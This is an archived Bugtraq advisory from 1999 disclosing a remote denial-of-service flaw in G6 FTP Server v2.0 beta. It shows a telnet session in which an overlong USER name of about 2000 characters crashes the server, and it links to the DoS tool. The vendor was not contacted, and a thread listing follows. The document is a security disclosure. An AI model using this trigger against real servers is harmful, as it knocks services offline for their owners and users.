Bugtraq mailing list archives

Remote D.o.S Attack in G6 FTP Server v2.0 (beta 4/5) Vulnerability

From: labs () USSRBACK COM (Ussr Labs)
Date: Wed, 17 Nov 1999 03:22:09 -0300


Remote D.o.S Attack in G6 FTP Server v2.0 (beta 4/5) Vulnerability

PROBLEM

UssrLabs found a Local/Remote DoS Attack in G6 FTP Server v2.0 (beta 4/5),
the buffer overflow is caused by a long user name,  2000 characters.
the G6FTP start to do infinites loops in the main program,and start eating
all memory and all computer resource CPU 100%, at the moment of no more
memory, if this happend ALL System is down :(

Example:
[[gimmemore@itsme]$ telnet example.com 21
Trying example.com...
Connected to example.com.
Escape character is '^]'.
220-G6 FTP Server v2.0 (beta 5) ready ...
USER {buffer)

Binary/Source for this D.O.S:

http://www.ussrback.com/g6ftp/

Where buffer is 2000 characters.

Vendor Status:
Not Contacted

Vendor   Url:  http://www.gene6.com/
Program Url: http://www.gene6.com/g6ftpd/download.html

Credit: USSRLABS

SOLUTION
    Nothing yet.

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h
http://WWW.USSRBACK.COM

Current thread:

Re: ssh-1.2.27 remote buffer overflow - exploitable (VD#7), (continued)
- Re: ssh-1.2.27 remote buffer overflow - exploitable (VD#7) Theo de Raadt (Nov 13)
  - Re: ssh-1.2.27 remote buffer overflow - exploitable (VD#7) Szilveszter Adam (Nov 14)
  - Re: ssh-1.2.27 remote buffer overflow - exploitable (VD#7) Brian Fundakowski Feldman (Nov 14)
- BIND 8.2.2-P5 release announcement Roger Fajman (Nov 13)
- Re: ssh-1.2.27 remote buffer overflow - exploitable (VD#7) Oystein Viggen (Nov 16)
  - Re: ssh-1.2.27 remote buffer overflow - exploitable (VD#7) Daniel Jacobowitz (Nov 16)
  - Re: ssh-1.2.27 remote buffer overflow - exploitable (VD#7) Jochen Bauer (Nov 16)
    - Re: ssh-1.2.27 remote buffer overflow - exploitable (VD#7) Nick Craig-Wood (Nov 18)
    - ProFTPd - mod_sqlpw.c Todd C. Campbell (Nov 19)
    - Pandora v4 Beta 2 Software Simple Nomad (Nov 19)
  - Remote D.o.S Attack in G6 FTP Server v2.0 (beta 4/5) Vulnerability Ussr Labs (Nov 16)
    - Re: Remote D.o.S Attack in G6 FTP Server v2.0 (beta 4/5) Vulnerability Seth R Arnold (Nov 17)
    - Re: Remote D.o.S Attack in G6 FTP Server v2.0 (beta 4/5) Vulnerability Marc (Nov 17)
    - SuSE Security Announcement - syslogd (a1) Thomas Biege (Nov 18)
    - local users can panic linux kernel (was: SuSE syslogd advisory) Mixter (Nov 18)
    - Re: local users can panic linux kernel (was: SuSE syslogd advisory) Alan Cox (Nov 19)
    - Re: local users can panic linux kernel (was: SuSE syslogd advisory) Savochkin Andrey Vladimirovich (Nov 20)
    - ANN: Bruce v1.0 Early Access 1 - Available for downloa Alec Muffett (Nov 22)
    - Re: local users can panic linux kernel (was: SuSE syslogd Alan Cox (Nov 22)
    - Re: local users can panic linux kernel (was: SuSE syslogd Savochkin Andrey Vladimirovich (Nov 23)
    - Re: local users can panic linux kernel (was: SuSE syslogd Darren Reed (Nov 23)

(Thread continues...)